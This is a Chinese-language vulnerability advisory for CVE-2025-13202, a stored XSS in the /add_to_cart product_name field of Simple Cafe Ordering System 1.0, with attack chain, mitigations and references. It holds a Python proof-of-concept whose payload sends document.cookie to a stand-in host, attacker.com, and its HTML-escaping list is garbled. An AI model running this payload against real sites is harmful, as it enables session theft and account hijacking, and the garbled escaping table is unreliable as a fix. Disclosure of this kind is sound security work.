CVE-2025-13202 Simple Cafe Ordering System 1.0 /add_to

漏洞信息

漏洞编号

CVE-2025-13202

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

code-projects Simple Cafe Ordering System 1.0

漏洞概述

CVE-2025-13202是code-projects Simple Cafe Ordering System 1.0中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于/add_to_cart功能的product_name参数处，攻击者可以通过该参数注入恶意的JavaScript代码。由于该参数在后续页面中会被直接回显且缺乏有效的输入过滤和输出编码，恶意脚本将在受害者的浏览器中执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。该漏洞的CVSS评分为3.5，属于低危级别，攻击复杂度低，但需要低权限用户身份和用户交互才能成功利用。漏洞已于2025年11月15日公开披露， exploits已发布，厂商尚未发布官方修复补丁。

技术细节

该漏洞为存储型XSS，存在于Simple Cafe Ordering System 1.0的购物车功能模块中。具体问题在于/add_to_cart端点对product_name参数的处理不当，缺少输入验证和输出编码。当用户提交产品到购物车时，系统直接将用户输入的product_name存储并在后续页面中回显，未对特殊字符进行HTML实体编码。攻击者可在product_name参数中注入<script>标签或事件处理器（如onerror、onload等）配合JavaScript代码。由于是存储型XSS，恶意脚本会被永久存储在数据库中，所有访问该产品信息的用户都会触发漏洞。攻击者常利用此漏洞窃取用户的认证令牌（cookie），进而冒充合法用户进行操作。修复方案是在服务端对所有用户输入进行严格的白名单验证，并在输出时对HTML特殊字符进行实体编码（<转义为<，>转义为>，"转义为"，'转义为'，&转义为&）。

攻击链分析

STEP 1

步骤1

攻击者访问Simple Cafe Ordering System 1.0的/add_to_cart功能页面

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的product_name参数（如<script>alert('XSS')</script>）并提交

STEP 3

步骤3

服务端接收product_name参数后，未进行输入验证和输出编码，直接存储到数据库

STEP 4

步骤4

当其他用户访问购物车页面或相关功能时，后端从数据库读取product_name并回显到HTML页面

STEP 5

步骤5

受害者的浏览器解析HTML时执行注入的恶意JavaScript代码

STEP 6

步骤6

攻击者通过恶意脚本窃取用户cookie、会话令牌或其他敏感信息

STEP 7

步骤7

攻击者利用窃取的凭证劫持用户账户或进行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import argparse

# CVE-2025-13202 PoC - Stored XSS in Simple Cafe Ordering System 1.0
# Target: /add_to_cart endpoint with product_name parameter

def exploit_xss(target_url, payload):
    """
    Exploit stored XSS vulnerability in product_name parameter
    """
    # XSS payload - steals cookie
    xss_payload = f'<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>'
    
    # Target endpoint
    endpoint = f"{target_url}/add_to_cart"
    
    # Request data
    data = {
        'product_name': payload if payload else xss_payload,
        'quantity': '1'
    }
    
    try:
        # Send POST request to add product with XSS payload
        response = requests.post(endpoint, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Payload sent successfully!")
            print(f"[+] Payload: {payload}")
            print(f"[+] Visit: {target_url}/cart to trigger XSS")
            return True
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-13202 PoC')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-p', '--payload', help='Custom XSS payload')
    args = parser.parse_args()
    
    exploit_xss(args.url, args.payload)

影响范围

code-projects Simple Cafe Ordering System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，可采取以下临时缓解措施：1) 部署Web应用防火墙（WAF）规则拦截包含<script>标签、javascript:协议和事件处理器（onerror、onload等）的请求；2) 在反向代理层添加输入过滤规则，对/add_to_cart端点的product_name参数进行HTML特殊字符过滤；3) 临时禁用购物车功能的相关页面展示；4) 加强对管理员和用户的安全意识培训，提醒不要点击可疑链接；5) 实施严格的CORS策略限制跨域请求；6) 定期监控应用日志，检测潜在的XSS攻击尝试特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13202
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13202
3 Details https://www.cvedetails.com/cve/CVE-2025-13202/
4 VulDB https://vuldb.com/cve/CVE-2025-13202
5 Link https://code-projects.org/
6 Link https://github.com/shenxianyuguitian/cafeorder_vuln_XSS/blob/main/README.md
7 Link https://vuldb.com/?ctiid.332500
8 Link https://vuldb.com/?id.332500
9 Link https://vuldb.com/?submit.685729

CVE-2025-13202 Simple Cafe Ordering System 1.0 /add_to_cart XSS漏洞